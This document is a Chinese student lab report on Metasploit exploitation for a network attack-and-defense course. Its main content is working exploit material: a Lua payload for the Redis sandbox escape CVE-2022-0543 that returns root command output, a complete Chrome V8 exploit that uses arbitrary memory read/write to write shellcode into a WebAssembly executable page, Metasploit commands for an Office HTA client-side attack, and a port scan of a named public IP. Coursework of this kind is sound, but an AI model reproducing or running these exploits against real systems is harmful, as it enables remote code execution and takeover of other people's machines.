20202411 2022-2023-2 《网络与系统攻防技术》实验六实验报告
这是一个目录
1.实验内容
本次实验的主要内容是学习通过metasploit进行漏洞的利用,虽然上次的实验二已经尝试学习过使用metasploit了,但是这次的实验是进一步扩展,同时也更加令人感到头大。主要通过主动攻击,对浏览器的攻击,对客户端的攻击和辅助模块的利用四个方面进行尝试。
2.实验内容
2.1-一个主动攻击实践,尽量使用最新的类似漏洞
CVE-2022-0543
这是之前做漏洞复现我选的漏洞,是redis数据库的沙箱逃逸,通过在redis数据库中执行lua代码,调用包来进行提权。
这个漏洞太简单以至于都不太需要msfconsole,直接连上数据库就可以直接攻击,防不胜防,CVE10分,一行代码获取root权限,代码如下:
local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
local io = io_l();
local f = io.popen("id", "r");
local res = f:read("*a");
f:close();
return res
可以看到直接返回了root权限的信息。
2.2-一个针对浏览器的攻击,尽量使用最新的类似漏洞
B6-2021-041301
这个漏洞是由360CERT报告的0day漏洞,针对Chrome浏览器在不开启沙箱模式下可以运行任意指令。
这里需要两个文件,一个是exp.html,一个是exp.js,让浏览器打开exp.html就可以调用exp.js文件,在这个js文件中目标代码是运行计算机程序。
exp.html如下:
<script src="exp.js"></script>
exp.js如下:
/*
/*
BSD 2-Clause License
Copyright (c) 2021, rajvardhan agarwal
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
let buf2 = new ArrayBuffer(0x150);
function ftoi(val) {
f64_buf[0] = val;
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}
function itof(val) {
u64_buf[0] = Number(val & 0xffffffffn);
u64_buf[1] = Number(val >> 32n);
return f64_buf[0];
}
const _arr = new Uint32Array([2**31]);
function foo(a) {
var x = 1;
x = (_arr[0] ^ 0) + 1;
x = Math.abs(x);
x -= 2147483647;
x = Math.max(x, 0);
x -= 1;
if(x==-1) x = 0;
var arr = new Array(x);
arr.shift();
var cor = [1.1, 1.2, 1.3];
return [arr, cor];
}
for(var i=0;i<0x3000;++i)
foo(true);
var x = foo(false);
var arr = x[0];
var cor = x[1];
const idx = 6;
arr[idx+10] = 0x4242;
function addrof(k) {
arr[idx+1] = k;
return ftoi(cor[0]) & 0xffffffffn;
}
function fakeobj(k) {
cor[0] = itof(k);
return arr[idx+1];
}
var float_array_map = ftoi(cor[3]);
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var fake = fakeobj(addrof(arr2) + 0x20n);
function arbread(addr) {
if (addr % 2n == 0) {
addr += 1n;
}
arr2[1] = itof((2n << 32n) + addr - 8n);
return (fake[0]);
}
function arbwrite(addr, val) {
if (addr % 2n == 0) {
addr += 1n;
}
arr2[1] = itof((2n << 32n) + addr - 8n);
fake[0] = itof(BigInt(val));
}
function copy_shellcode(addr, shellcode) {
let dataview = new DataView(buf2);
let buf_addr = addrof(buf2);
let backing_store_addr = buf_addr + 0x14n;
arbwrite(backing_store_addr, addr);
for (let i = 0; i < shellcode.length; i++) {
dataview.setUint32(4*i, shellcode[i], true);
}
}
var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
copy_shellcode(rwx_page_addr, shellcode);
f();
可以看到一打开这个网址马上就能运行计算器了。
2.3-一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞
最烦人的就是这个任务了。
我们选择office 2016作为目标客户端,在msfconsole中输入以下命令生成payload文件。
search office
use exploit/windows/fileformat/office_word_hta
exploit
靶机通过访问攻击机开启的http://10.211.55.22:8080/default.hta进行payload的下载,在提示中选择保留文件。并双击运行,msfconsole就可以接收到信息并控制主机了。
2.4-成功应用任何一个辅助模块
最后的辅助模块就参考上一届的博客,采用portscan进行。通过采用auxiliary/scanner/portscan/ack设置TCP ACK标志位,探测防火墙是否过滤,被扫描的端口只要没有被防火墙保护,不管开放还是关闭,都会返回RST,而没有被防火墙保护的端口则会显示UNFILTERED。在msfconsole中输入下列命令:
use auxiliary/scanner/portscan/ack
search auxiliary
set payload windows/meterpreter/reverse_tcp
show options
set PORTS 1-1024
set RHOST 120.46.218.88
exploit
因为这一部分的环境我是采用了云服务器,同时安全组中是有关闭了一些端口,而且在没有多线程的情况下扫描的速度非常之慢,所以等了好一会儿也只扫到两个。这两个端口就是显示UNFILTERED的,也就是没有呗防火墙保护的。
3.问题及解决方案
- 问题1:Adobe Acrobat Reader8一开木马pdf就崩溃
- 问题1解决方案:之前尝试的时候还是有成功过的,这次就又完全不行,没办法,换客户端,wireshark,向日葵,redis那些一个一个试过来,最后选了office的漏洞。只能说麻中麻了。
4.学习感悟、思考等
这次的实验,相比于上次metasploit的实验,虽然看着感觉量少了很多,但是真的做起来的时候确实又是非常的难搞,因为有些漏洞已经被修复了,有些一开启就会崩溃,这就是为什么要找最新的漏洞的原因,不过这次实验确实是发现了metasploit这个软件是真的太强大了。
扫一扫
630
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
